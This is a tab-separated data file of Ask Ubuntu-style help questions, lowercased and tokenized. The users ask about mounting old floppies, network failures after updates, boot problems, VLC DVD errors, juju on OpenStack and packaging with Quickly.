423811	5.25 '' floppies wo n't mount	i have received some research that is on 5 . 25 '' floppies . my mobo supports 5 . 25 '' disks , and , i have the disk drive . i am not trying to use this media long term , i just want the research data . update thurs march 6th : i just found out the file-system is some proprietary system put out by varian . i have a machine that might be able to read the data ... or that machine might not work . if anyone knows about archaic varian oses / file-systems , i would be happy to hear about it . image mounting is current priority , i have been able to get disk images using ddrescue , and or safecopy . both softwares show that there is block errors on some disks . i am still unable to mount the images the disks produce , mount persistently asks for file-system type . fat , vfat , exfat , fat16 and some others i tried , but they fail , saying something like incorrect fs type . yes , i have also tried combinations of -o loop . i have been unable to determine fs type by looking at the hexdump -c output from the image files . also , i thried to determine fs type this way : # dd if=lisa1.iso | file - /dev/stdin : data i still do not know how to get to where i can mount / see files . i just read that 18k is the standard block-size of a single track , so this is the `` native '' amount of bits the floppy read heads want to read anyway . it should be fastest and have the best chance of getting all the resalable bits . i will re-image the disks tomorrow . my boss says he does n't know what the file-system type is , or what it might have been . , i may able to locate the instrument which generated the data . this will require time to dig in the graveyard of old science equipment . i have installed testdisk to try and do data recovery . i can remember having to do something like this in 2008 , but i ca n't recall now , how i used to recover floppy disk data . when i run udisk , or mount i get an error saying the floppy is not a valid block device . $ sudo mount /dev/fd0 desktop/lisa/ mount : /dev/fd0 is not a valid block device $ sudo udisks -- mount /dev/fd0 mount failed : error mounting : mount : /dev/fd0 is not a valid block device update1 : floppy drive port options are on . i have them set to 5 . 25 '' double density the disk drive models are : epson sd-700 and epson sd-600 the disks are verbatum datalife md 2d `` double density '' i have added the module for floppy disks . update2 : $ sudo udisks -- mount /dev/fd0 mount failed : error mounting : mount : you must specify the filesystem type mount gives the same error , but ... i do n't know the file system type . $ getfdprm ds qd sect=13 i ran this program from fdutils . http : //www.fdutils.linux.lu/fdutils.html ds means double sided qd means quad density sect=13 is a sector count . i do n't really know what the output means , in terms of how to mount the disks and get the data . what should i do to find the filesystem type ? update3 : as a sanity check , i found a `` new '' box of blank , formatted floppies , i was able to read and write data , without specifying a file system type . assuming the floppies i have with research on them are formatted , and have errors , might that prevent them from being mounted ? heres what ddrescue is doing : $ sudo ddrescue /dev/fd0 ~/desktop/fd0.iso press ctrl-c to interrupt rescued : 454656 b , errsize : 1019 kb , current rate : 0 b/s ipos : 538624 b , errors : 11 , average rate : 69 b/s opos : 538624 b , time from last successful read : 40 s
423817	emacs-23 does not open its file arg ; double-clicking on file opens blank emacs	when i double-click on a file and open it with emacs-23 , emacs ignores its first input . it comes up with a blank white screen window being the empty `` *scratch* '' buffer , instead of the expected file to edit . and it says `` file exists : /home/myusername/.emacs.d/ '' in the message bar . it also does this if i invoke emacs existing_filename from the terminal . does n't seem to be a permissions problem , these are all my files , with -rw-r -- r -- on them . it 's not even loading the file as a buffer in the background . however , open file then works on the file , so there 's nothing fundamentally blocking it . how do i configure emacs so it comes up with its first argument file for editing ? new install , emacs 45.0 metapackage , emacs23 .4+1-4ubuntu2 , 32-bit ubuntu 13.10 .
423818	create an alias for `localhost:8080/` as `www.my-domain.com/`	in ubuntu , i want to create an alias for localhost:8080/ as www.my-domain.com/ . so that whenever i type www.my-domain.com/ in url field , it shows up from localhost:8080/ . what is the easiest way to set this up ? is there any application that could just do this mapping ? in windows , i used to use fiddler2 to achieve the same goals .
423819	not enough space to update on 12.04	when i try to update , i get this message ... the upgrade needs a total of 399 m free space on disk '/ ' . please free at least an additional 29.8 m of disk space on '/ ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . i tried typing this command into terminal , but nothing happens . what am i doing wrong ?
423820	use existing mail to send mail php , ubuntu 13.04	i 'm going crazy trying every existing guide to configure my ubuntu server to send mail in php . i have a homepage which i want to send mail from when someone is registering . currently i have erased every program that sends mail on my ubuntu machine like sendmail , postfix and other programs . is there any other way to go ? i want to use a mail program that i have on a domain site called one.com . please help me
423821	ubuntu builder not launch	i tried a install ubuntu-builder from this site , i installed it with usc , but when i launch it , a few seconds loading and nothing ... i tried purge it and install with adding ppa repository and again install it , but didnât helped ... i use ubuntu 13.10 64 bit with last updates ... i tried restart , but not helped .
423822	set application icon	i 'm building a qml application with the ubuntu sdk . i 've figured out how to add an application icon to the .desktop file , but i 'm not sure where to add the window icon itself . i 've seen code for setting applicaton.windowicon with c++ , but i 'm just using qml/js . how can i add my icon to the application configuration ?
423824	widget layer does n't show up !	i installed and followed step-by-step compizconfig settings manager along with all the extra and the application screenlets ( i used the following website as my guidance ) ( http : //ohbuntu.blogspot.pt/2010/01/mac-os-x-for-gnome-ubuntu-how-to.html ) but when i try to actually put them to work and press the shortcuts nothing happens ! i guess i might be missing something . any idea ? btw i am using ubuntu 13.1 thanks !
423827	how can i read the windows 8 licence key with ubuntu ?	i have a dual boot windows 8 and ubuntu on my laptop . is it possible to read the windows licence key under ubuntu ? ( i guess it is hidden in the windows registry somehow )
423833	ubuntu one ca n't connect	i 'm trying to upload a file to my ubuntu one cloud , but when i open the ubuntu one control panel on my ubuntu 12.04 machine , it notifies me that `` file sync is disconnected . '' so , naturally , i 'll click the `` connect '' button next to it , and it will say `` file sync in progress ... '' and it will want to upload my file , but it does n't seem like anything is happening . then , after a minute , it will simply regress into `` file sync is disconnected . '' this , of course , frustrates me greatly , and causes me to wonder , what could i possibly be doing wrong ? i have already tried u1sdtool -q , u1sdtool -- status , and u1sdtool -- start the status report is : > u1sdtool -- status state : waiting connection : with user with network description : waiting before try connecting again is_connected : false is_error : false is_online : false queues : working although i am able to add or remove devices from both web service as well as ubuntuone on my desktop running ubuntu 13.10 .
423836	can not boot from external hdd	alright guys i 'm new here and i need a hand , i 've looked at dozens of other posts and nothing has helped me solve this . i 'll try to give as much information as possible but if you need more just say so . first , i will explain what i am trying to do . i have a lenovo t430s , running windows 8.1 ( 64 bit ) and i have 8 gb of ram . i took the hard drive out of my old toshiba laptop and turned it into an external hard drive . i want to install ubuntu on that so i can have the os without actually changing any of the internal stuff of my laptop . from what i understand on how it is supposed to work i should just be able to plug in the hdd before start up and it will boot ubuntu instead . what i did : changed my bios settings so usb drives are first . downloaded the ubuntu iso file . i have tried with both ubuntu 12.04.4-desktop-amd64 and 13.10-desktop-amd64 . checked the hash with winmd5sum , its all good according to that . used linux live usb creator with my 32 gb verbatim flash drive . restarted my computer with both the flash drive and the external hdd plugged in , chose to install ubuntu . did the install stuff , pretty sure i got it right . went with `` something else '' , then used the external drive . i tried a few combinations of partitions but i keep getting the same result . the setup i want and i think should work is this : first i partitioned off 500 mb for `` /boot '' , ext4 format . then i did 60 gb for `` / '' , ext4 format ( figured i might as well have lots of space for programs ) . then i did 8 gb for swap . then finally around 60 gb or so for `` /home '' , ext4 format ( not entirely sure on the /home size , i just wanted to leave 100 gb for a nfts format so both os could access the same files , so the remaining memory went to /home ) . then i changed the `` boot from '' or whatever it says for that bar across the bottom to the /boot partition . the rest of the install is pretty straight forward , everything seems to go smoothly and then it tells me that i need to restart , so i do . but i cant boot from the hdd . if i do n't have the flash drive plugged in nothing happens . i 've tried pushing enter ( thats what it is for lenovo at startup ) and then trying to `` boot from once '' with the hdd , it just goes blank for 0.5-1.5 seconds then brings me back to the same page , eventually i just have to pick my internal drive and start windows . some posts i 've seen say to boot from the flash drive again and repair the install , but i dont have a repair option . i can scan for errors though and with the 12.04 it says 2 errors ( no details or help on how to fix them ) and with 13.10 i get 1 error . i do n't know where to go from here . i just wanted to be able to do my homework without having to go to the computer lab haha . any help will be greatly appreciated .
423837	how to access open terminal with running process using ssh ?	i have two computers with ubuntu 12.04 and 13.10 both desktop versions . on the 12.04 i have opened terminal and process running in it . the process is displaying some states information and allows changing some setting on the fly . so , i want to access the 12.04 from the other pc and manage the process . i have successfully connected to the pc using ssh , but i was not able to find how to see the process in the terminal .
423838	ubuntu 12.04.4 64-bit & amd hd7850 gpu , issue with additional drivers menu	my girlfriend just installed a fresh copy of ubuntu 12.04.4 64-bit on her pc . after installing and updating the system , ubuntu has been using the open source drivers for her gpu - the amd hd7850 with 1 gb of gddr5 . the issue games such as nexuiz , xonotic , half-life 1 , starbound and even no more room in hell run extremly good , at a minimum of 60fps , 1080p and with high details , but left for dead 2 runs at a low framerate ( 20-30fps ) at low details . other games , such as rust and anna , do n't run at all ( black screen ) . for this reason , above all , i recommended installing the proprietary amd video drivers for her gpu . the question now is ; which one is the stable/recommended driver ? they 're all the same , they all have the exact same description . i assume one of those is recommended and the others are beta drivers , just like it was in ubuntu 12.04.3 64-bit . or maybe the open source amd driver has become the recommended driver , i do n't know . thanks !
423839	connecting and controlling my desktop with my laptop monitor using ubuntu .	i would like to know how to use my laptop as a monitor for my desktop . my laptop is running windows 7 and my desktop is running ubuntu 13.10. i do not have a monitor for the desktop . thank you .
423848	hdmi connection only displays desktop background using ubuntu 13.10	when i connect the hdmi cable to my laptop , only the desktop background is displayed on my tv . there is no mouse pointer or applications just the background image . i 'm using ubuntu 13.10 .
423850	switching the default session ubuntu 13.10	when my ubuntu 13.10 boots the screen goes black and has no response . i used to run on gnome fallback and would like to switch back to it but i ca n't get to the login screen due to the automatic login . my only access to terminal is the root shell prompt and i 've tried to turn off the autologin in gdm from there but it restricts me to read-only . any help is much appreciated .
423853	can not create a partition table on /dev/sdb	when i 'm trying to create a partition table on my 8gb sd card , its showing this error : fdisk : unable to read /dev/sdb : input/output error i have used sudo fdisk -l , there the /dev/sdb is not listed , what should i do ? please help me .
423856	i successfully installed ubuntu 12.04 64 bit side by side with windows 7 32 bit and have no boot option on startup	i have installed ubuntu 12.04 to run along with windows 7 32 bit . it says installation was successful , however when i restart the computer i do not get an option to select ubuntu , the computer automatically runs windows .
423858	why am i unable to install grub customizer ?	i am using ubuntu 13.10. mariaeugenia @ mariae-ubuntu : ~ $ sudo add-apt-repository ppa : danielrichter2007/grub-customizer [ sudo ] password for mariaeugenia : this ppa contains the latest release of grub customizer . sudo add-apt-repository ppa : danielrichter2007/grub-customizer sudo apt-get update sudo apt-get install grub-customizer mais informações : https : //launchpad.net/~danielrichter2007/+archive/grub-customizer pressione [ enter ] para continuar ou ctrl-c para cancelar a adição gpg : chaveiro `/tmp/tmpgj0wxv/secring.gpg ' criado gpg : chaveiro `/tmp/tmpgj0wxv/pubring.gpg ' criado gpg : requisitando chave 3f055c03 de servidor hkp - keyserver.ubuntu.com gpg : /tmp/tmpgj0wxv/trustdb.gpg : banco de dados de confiabilidade criado gpg : chave 3f055c03 : chave pública `` launchpad ppa for daniel richter '' importada gpg : ultimamente não encontradas chaves confiáveis gpg : número total processado : 1 gpg : importados : 1 ( rsa : 1 ) ok
423862	pr-link wireless device	i have a wireless device make tp-link model tl_wdn3200 which does not work with ubuntu . i can download windows drives which will not extract . can this wireless device be used ?
423863	ca n't boot from usb drive	i 'm trying to install ubuntu and in bios there is no boot from usb drive or anything like that . i would boot it from disk , but my laptops cd/dvd reader is broken and it ca n't read anything . please help ?
423866	libreoffice auto-restores user profile	i encountered a problem with libreoffice writer today . the problem is that , when i insert a picture and change the anchor from 'as a character ' to 'to a paragraph ' i am unable to move the picture from the first page of the document to any other page . even when i add the picture on , for example , page 2 , when i change the anchor it gets stuck on page one . other anchors behave the same . so i have a picture tied to the first page , which is a problem that came up overnight . i tried a lot to resolve this problem . firstly i tried to reinstall through the software center , which did not solve the problem . secondly i tried a complete purge of libreoffice writer and reinstalled via software center with sudo apt-get remove -- purge libreoffice-writer / sudo apt-get clean / sudo apt-get autoremove thirdly i tried to remove my user profile by renaming the libreoffice config folder ( the /3 folder was renamed ) . in all cases i noticed that the user preferences were not reset , because the default dictionary did not revert to english , but stayed on dutch , which i changed myself . the problem also persisted . my question : is there a way to prevent libreoffice from 'restoring ' itself to it 's previous user profile or is there a way to purge all files and do a clean install of libreoffice ( writer ) ? a way to solve the original picture bug , without a clean install is also welcome of course , but i do n't believe it is a common bug with a known solution .
423868	ssl reverse proxy	how would i go about setting up a ssl reverse proxy using apache as the ssl reverse proxy and lighttpd as the web server ? i want everyone to be forced to connect with ssl , so any http connections get redirected to https . i want the web server running on 8080 to only accept connections from 127.0.0.1 ( ie the proxy server ) i want my application on port 23424 to be accessible using a /example rather than :23424/example . what would be the best way of going about this ? on ubuntu12.04 lts
423869	how to use nautilus as ftp : connect to server not working	i am trying to connect to my ftp server from nautilus . i am simply trying to update some .html files . i enter my domain here , but nothing happens and i can not click `` connect '' . any suggestions ?
423870	keep finding errors when checking for file defects !	i downloaded ubuntu 12.04.4 lts 64-bit and created a live usb . but when check for defects before installation i always get 2 - 3 errors . i re-downloaded the iso file , tried three different live usb creators multiple times ( unetbootin , universal-usb-installer , lili usb creator ) but no luck . i even scanned the usb drive for defects but none were found . i am using windows 8.1 64-bit . are there any suggestions to why this happens ?
423876	map my second hard drive to be sda1	i recently switched hard drive and had a fresh install ( 13.10 ) . i copied across the settings from some programs , including banshee and transmission . on the old install , my primary hdd was sda and the storage partition mounted at sda2 . this partition now mounts at /media/pc-user/0391a5db-61d8-4c3d-b633-59c710ed4386 and is called sdc1 . the new hdd is sda and sda2 is an `` extended partition '' . can i format it and put a link there ? this image shows what 's currently sda2 and what i need to get to . http : //i.imgur.com/ti2q06z.jpg ? 1 how can i get it to mount at /media/pc-user/sda2 so that banshee and transmission automatically find their files ?
423879	vlc fails to play dvds from external drive	i just bought an external dvd drive for my system76 galago ultra-pro , running ubuntu 13.10 . i installed libdvdread4 following the instructions here : https : //help.ubuntu.com/community/restrictedformats/playingdvds now , when i try to play a region-2 dvd , it will work in totem , but not in vlc . a region-1 dvd causes totem to crash but raises the same error in vlc . i 'd like to get vlc to work because i hope to use handbrake to make backups of some dvds . when i run any dvd in vlc i get the errors in this picture : from the terminal : $ vlc vlc media player 2.1.2 rincewind ( revision 2.1.2-0-ga4c4876 ) [ 0x1026058 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd1 no such file or directory libdvdread : could not open /dev/dvd1 libdvdnav : vm : failed to open/read the dvd libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd1 no such file or directory libdvdread : could not open /dev/dvd1 [ 0x7fed5c000e78 ] dvdread demux error : dvdread can not open source : /dev/dvd1 [ 0x7fed700032b8 ] main input error : open of `dvd : ///dev/dvd1 ' failed so vlc ca n't find my drive ? any suggestions how to fix it ?
423886	efficiently search sorted file	i have a large file containing one string on each line . i would like to be able to quickly determine if a string is in the file . ideally , this would be done using a binary chop type algorithm . some googling revealed the look command with the -b flag which promises to locate and output all strings beginning with a given prefix using a binary search algorithm . unfortunately , it does n't seem to work correctly and returns null results for strings that i know are in the file ( they are properly returned by the equivalent grep search ) . does anyone know of another utility or strategy to search this file efficiently ?
423888	ubuntu one paused	i 'm not sure what to make of this one . i just reinstlled ubuntu 13.10 x64 and the u1 indicator keeps showing that it 's paused . no errors , it shows everything correctly in the folder , but 4 or 5 minutes after booting to the desktop the indicator shows paused . if i manually turn it on , it works for another 4 or 5 minutes , then back to paused . before the reinstall , i never had this issue . same machine since november , asus q501la . any ideas what could be causing this ? its more of an annoyance than anything else .
423889	12.04 kernel upgrade , graphics problem . can not access system	i have a desktop machine with an msi motherboard running ubuntu 12.04 . i installed a gt520 graphics card a few weeks ago and it has been working fine . this morning i let the system upgrade run through . it included lots of linux stuff - kernel headers , that sort of thing . about 50mb all up . anyhow , now the machine wo n't boot . the screens ( i have two ) are both blank . i pulled out the gt520 and plugged the monitors into the on-board graphics card one at a time . for one monitor , i get a message about `` ... gpu hung '' . the other monitor almost functions - it comes up with a login screen but it 's barely readable . i attempted to log in twice . the first time i got to a desktop with half-formed icons , but could go no further . second time i got to a black screen with a mouse pointer ( which moves ) but i ca n't do anything . this is my main work machine . any assistance much appreciated . update : ok , so now i have the machine booting reliably but it refuses to believe that my 22 '' monitor is any more than 1280x1024 . obviously i can not use it this way . i have tried attaching a 20 '' monitor and it thinks that this is 640x480 . so ... here 's what i have done : tried removing nvidia drivers with apt-get purge . this still left me with flickering , unreadable monitors . reinstalled the nvidia hardware and drivers . this left me with the situation i have now ( i.e . low resolution ) tried manually loading a new resolution with xrandr , but it gave me an error . tried uninstalling and installing drivers from 'additional drivers ' interface , but the os just seems to ignore whatever i do there tried removing the ~/.config/monitors.xml tried going back to an older version of the kernel ( via grub ) really , really need to find a solution to this ...
423896	how to solve old glib error	i am in the process of installing gtk+ but it needs various pre-requisites . these are glib - 2.0 > = 2.35.3 atk - > = 2.7.5 pango- > = 1.32.4 gdk-pixbuf-2.0 > = 2.27.1 now i upgraded my glib-2.0 to 2.38.2 , and i 've tried upgrading atk , pango and gdk-pixbuf checking for glib - version > = 2.31.2 ... 'pkg-config -- modversion glib-2.0 ' returned 2.38.2 , but glib ( 2.32.4 ) was found ! if pkg-config was correct , then it is best to remove the old version of glib . you may also be able to fix the error by modifying your ld_library_path enviroment variable , or by editing /etc/ld.so.conf . make sure you have run ldconfig if that is required on your system . if pkg-config was wrong , set the environment variable pkg_config_path to point to the correct configuration files configure : error : glib 2.31.2 or better is required . the latest version of glib is always available from ftp : //ftp.gtk.org/ . if glib is installed but not in the same location as pkg-config add the location of the file glib-2.0.pc to the environment variable pkg_config_path . i have been go round in circles for the past few hours trying to get this working , if anyone out there can help it would be much appreciated . thanks in advance
423897	unable to directly edit dbf files in libreoffice	i often use qgis and need to edit dbf files asociated with the shapefile layers . i am used to do it in libreoffice and it always worked on windows and i think it also worked in older versions of kubuntu . unfortunately i found out that currently the libreoffice calc opens the dbf file but saves not just the dbf but dbf + dbt file instead . the dbt file seems to contain all the data and qgis reports damaged data . is there any way to solve it ( install some additional library , set something ... ) ? i currently installed gnumeric which should be able to perform the editing but would prefer calc if possible .
423899	standalone lubuntu/ubuntu distro into ac100-10d	finally i had enough courage to sign up into this website . apparently i 'm an amateur with linux but i 'm starting to learn more and more about configuring it and `` fixing '' things every day . i have this toshiba ac100-10d smartbook and installed lubuntu distro 12.10 at the moment side by side android 4.0 and i was hoping to get answer for my question which is , as title asks can i install standalone lubuntu into ac100 without android 's partition table or is it necessary to have ? i mean if i download installer into lubuntu desktop and run it somehow and can format whole flash during installation as in normal linux install ? just want to make sure that if it 's possible/safe process to do then i might stick into it . thank you in advance !
423903	installing ubuntu 12.04 lts with a blank dvd/cd/disk problems	i would like to install the 32-bit version of ubuntu 12.04 on my computer alongside windows vista . i downloaded the iso file from the ubuntu website . then i formatted my empty / blank disc , and dragged the iso file from my downloads folder to my disk . i assumed that was all i needed to do , but when i rebooted my computer and selected my disk from the boot menu , it just booted up windows regularly . how can i install ubuntu on my computer alongside windows vista ?
423907	lost all my files	following routine ubuntu upgrade request on jan 19 , when reopened ubuntu could not find any of my document files or images . suspect they may be hiding somewhere , but wherecould not access my own blogspot blogs either . solutions welcomed !
423909	how to run code : :blocks from a usb flash drive	i have been using code : :blocks ide for quite some time , and i have had no problems with it until now . i have recently decided to move almost all of my programs onto a usb for portability . eclipse seems to work very well with creating it 's workspace on the usb , but code : :blocks keeps spitting out errors . i ca n't for the life of me find a solution to my problem , so i hoped you could help me out . here 's the error : sh : 1 : /media/luke/lukesusb/programmingcplusplus/i like pi/bin/debug/i like pi : permission denied i have tried running the sudo chmod -x command multiple times on almost all the files in the folders to no avail . the code for `` i like pi '' is just the default `` hello world '' code that the program generates when you make a new console project . any suggestions ?
423910	wc -l in multiple file or directories	in current directory , there are some runid from an experiment , is there any command to count number of runid 's separately at once . i am using now the following for each one of the runid for the current directory : ls | grep runid | wc -l
423911	do i need to put image metadata in a private bucket ?	i 'm experimenting using juju ( 16.6 ) to deploy services to our private openstack cloud and have noticed a couple of issues . when bootstrapping a new environment , juju apparently wants to look in the environment 's bucket for image metadata . i 've created a `` public '' bucket , using swift for the object store , and populated it with the image meta-data in `` streams/v1/* '' object paths - however when bootstrapping juju fails unless the meta-data is in the environment 's private bucket . is this normal ? and is there a work around in the environment 's config to fix this problem ? my environment is as follows ( less ssh keys ) : access-key : `` '' admin-secret : `` '' agent-version : 1.16.6 api-port : 17070 auth-mode : userpass auth-url : http : //173.23.181.5:5000/v2.0 authorized-keys : 'ssh-rsa ` ... ... ca-private-key : `` '' control-bucket : juju-bucket default-image-id : `` '' default-instance-type : `` '' default-series : precise development : false firewall-mode : instance image-metadata-url : `` '' logging-config : < root > =info name : openstack-ws password : xxxxxxxxxx public-bucket : juju-dist public-bucket-url : `` '' region : regionone secret-key : `` '' ssl-hostname-verification : true state-port : 37017 tenant-name : webservices tools-url : `` '' type : openstack use-floating-ip : true username : xxxxx once i get the environment to bootstrap , i next try to bring up a service . in my case , i 'm using the hadoop charm . when i deploy the hadoop master ( juju deploy hadoop hadoop-master ) , the instance fails to initialize with a `` hostname : name or service not known error '' . i suspect this is due to failure of a reverse dns lookup on the instances `` public '' ip address . does this sound correct ? what is the issue ?
423913	choppy recording of desktop effects	i 'm attempting to record a demo of the kde desktop effects on my computer . all seems to be working well , except for when rotate the cube , at which point it gets choppy . see this video for an example . i 've successfully pulled this off on other computers in the past but for some reason this one 's giving me trouble . as my recorder i 'm using kazam and my graphics card is a geforce 8400 gs . i 've also tried this with recordmydesktop and have tried using kazam to output the video to both mp4 and mpeg formats . any ideas as to what might be going on ?
423914	playonlinux and logitech f310	i tried everything but i could not get it to work in borderlands 2 . the virtual drive mock of playonlinux did work , recognized it but in the game it simply wont work . i even installed dxbox drivers and such . i also tried x360ce , but probably did not do it right . so frustrated at the moment . ubuntu recongizes the controller no problem .
423915	i ca n't download/install ubuntu	i want to download and install the 32 bit version over my desktop running xp . the file that it downloads is called ubuntu-13.10-desktop-i386.iso it is from ftp.citylink.co.nz , and it is 895 mb . windows has no idea what to do with a .iso file , and neither do i. i certainly ca n't double click on it and run anything .
423920	after update and reboot 12.04 lts server eth0 fails to start	i am working on a 12.04 lts lamp server . after running the latest updates i no longer have network connectivity . i get fails on boot for `` configuring network device '' and virtual network device . if config shows only the loopback no eth0 , and network-manager gives an error `` the system network services are not compatible with this version '' . if i manually enable eth0 i can then see it , but still no connectivity and no network-manager . here is a dump of a number of things i have tried over the past few hours . dhanshri @ lasoc : ~ $ sudo service networking restart [ sudo ] password for dhanshri : stop : unknown instance : start : job failed to start dhanshri @ lasoc : ~ $ lspci -nnk | grep -ia2 eth kernel driver in use : ata_piix kernel modules : pata_acpi 01:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gigabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : dell poweredge r710 bcm5709 gigabit ethernet [ 1028:0235 ] kernel driver in use : bnx2 kernel modules : bnx2 01:00.1 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gigabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : dell poweredge r710 bcm5709 gigabit ethernet [ 1028:0235 ] kernel driver in use : bnx2 kernel modules : bnx2 dhanshri @ lasoc : ~ $ sudo lshw -c network *-network:0 disabled description : ethernet interface product : netxtreme ii bcm5709 gigabit ethernet vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 20 serial : 78:2b : cb:67:18:7b capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=bnx2 driverversion=2.2.3 duplex=half firmware=6.2.12 bc 5.2.3 ncsi 2.0.11 latency=0 link=no multicast=yes port=twisted pair resources : irq:36 memory : da000000-dbffffff *-network:1 disabled description : ethernet interface product : netxtreme ii bcm5709 gigabit ethernet vendor : broadcom corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 logical name : eth1 version : 20 serial : 78:2b : cb:67:18:7d capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=bnx2 driverversion=2.2.3 duplex=half firmware=6.2.12 bc 5.2.3 ncsi 2.0.11 latency=0 link=no multicast=yes port=twisted pair resources : irq:48 memory : dc000000-ddffffff dhanshri @ lasoc : ~ $ sudo ifconfig eth0 up dhanshri @ lasoc : ~ $ sudo service networking restart stop : unknown instance : start : job failed to start dhanshri @ lasoc : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.0.29 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 8.8.8.8 8.8.4.4 dns-nameservers 192.168.0.15 192.168.0.7 dhanshri @ lasoc : ~ $ ifup eth0 /etc/network/interfaces:17 : duplicate option ifup : could n't read interfaces file `` /etc/network/interfaces '' dhanshri @ lasoc : ~ $ ip link 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 78:2b : cb:67:18:7b brd ff : ff : ff : ff : ff : ff 3 : eth1 : < broadcast , multicast > mtu 1500 qdisc noop state down qlen 1000 link/ether 78:2b : cb:67:18:7d brd ff : ff : ff : ff : ff : ff dhanshri @ lasoc : ~ $ sudo service network-manager stop [ sudo ] password for dhanshri : network-manager : unrecognized service dhanshri @ lasoc : ~ $ ifup eth0 /etc/network/interfaces:17 : duplicate option ifup : could n't read interfaces file `` /etc/network/interfaces '' dhanshri @ lasoc : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.0.29 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 8.8.8.8 8.8.4.4 dns-nameservers 192.168.0.15 192.168.0.7 dhanshri @ lasoc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 78:2b : cb:67:18:7b inet6 addr : fe80 : :7a2b : cbff : fe67:187b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:17683 errors:0 dropped:514 overruns:0 frame:0 tx packets:97 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2405254 ( 2.4 mb ) tx bytes:9621 ( 9.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:864 errors:0 dropped:0 overruns:0 frame:0 tx packets:864 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:73184 ( 73.1 kb ) tx bytes:73184 ( 73.1 kb )
423921	quickly produces an error when installing	i ported an application over to quickly , replacing all the files as necessary . when i say quickly run the application runs without flaw . however , the problem occurs when i try to package/install it . here 's the problem that occurs when i try to install : $ sudo python ./setup.py install running install running build running build_py running build_scripts running build_i18n intltool-update -p -g foobar running build_icons running build_help running install_lib running install_scripts changing mode of /usr/local/bin/foobar to 755 running install_data running install_egg_info removing /usr/local/lib/python2.7/dist-packages/foobar-0.1a.egg-info writing /usr/local/lib/python2.7/dist-packages/foobar-0.1a.egg-info traceback ( most recent call last ) : file `` setup.py '' , line 146 , in < module > cmdclass= { 'install ' : installandupdatedatadirectory } file `` /usr/lib/python2.7/dist-packages/distutilsextra/auto.py '' , line 100 , in setup distutils.core.setup ( **attrs ) file `` /usr/lib/python2.7/distutils/core.py '' , line 152 , in setup dist.run_commands ( ) file `` /usr/lib/python2.7/distutils/dist.py '' , line 953 , in run_commands self.run_command ( cmd ) file `` /usr/lib/python2.7/distutils/dist.py '' , line 972 , in run_command cmd_obj.run ( ) file `` setup.py '' , line 120 , in run target_data = '/ ' + os.path.relpath ( self.install_data , self.root ) + '/' file `` /usr/lib/python2.7/posixpath.py '' , line 422 , in relpath start_list = [ x for x in abspath ( start ) .split ( sep ) if x ] file `` /usr/lib/python2.7/posixpath.py '' , line 352 , in abspath if not isabs ( path ) : file `` /usr/lib/python2.7/posixpath.py '' , line 61 , in isabs return s.startswith ( '/ ' ) attributeerror : 'nonetype ' object has no attribute 'startswith' since the program quickly runs fine , i figure it 's a problem with the setup file : here 's the part that i configured for setup.py : distutilsextra.auto.setup ( name='foobar ' , version='0.1a ' , license='gpl-3 ' , author='my name ' , author_email='myemail @ foobar.com ' , description='a description ' , long_description='a looooonger description ' , url='https : //launchpad.net/foobar ' , cmdclass= { 'install ' : installandupdatedatadirectory } ) some extra info : $ quickly -- version quickly 12.08.1 python interpreter : /usr/bin/python 2.7.5 python standard library : /usr/lib/python2.7 quickly used library : /usr/lib/python2.7/dist-packages/quickly quickly data path : /usr/share/quickly quickly detected template directories : /usr/share/quickly/templates/ copyright 2009 rick spencer copyright 2009-2011 didier roche copyright 2010-2011 canonical ltd https : //launchpad.net/quickly quickly comes with absolutely no warranty . quickly is free software , and you may use , modify and redistribute it under the terms of the gnu general public license version 3 or later . i am using ubuntu 13.10 , but i 've tested this on trusty as well and got the same result . thank you !
423924	kernel panic error after broken pipe error	i installed 12.04 lts on my mom 's pc , it crashed on boot up with a grub error- ran grub repair and fixed it- then it started crashing with a broken pipe error- now i am getting the black screen with kernel panic-not syncing : attempted to kill init . is this a hardware issue ? i have not tried booting off the live cd yet because i do not have it , and it is an amd so the boot shortcut is kind of finicky . i thought maybe the graphics driver is upset- any ideas ?
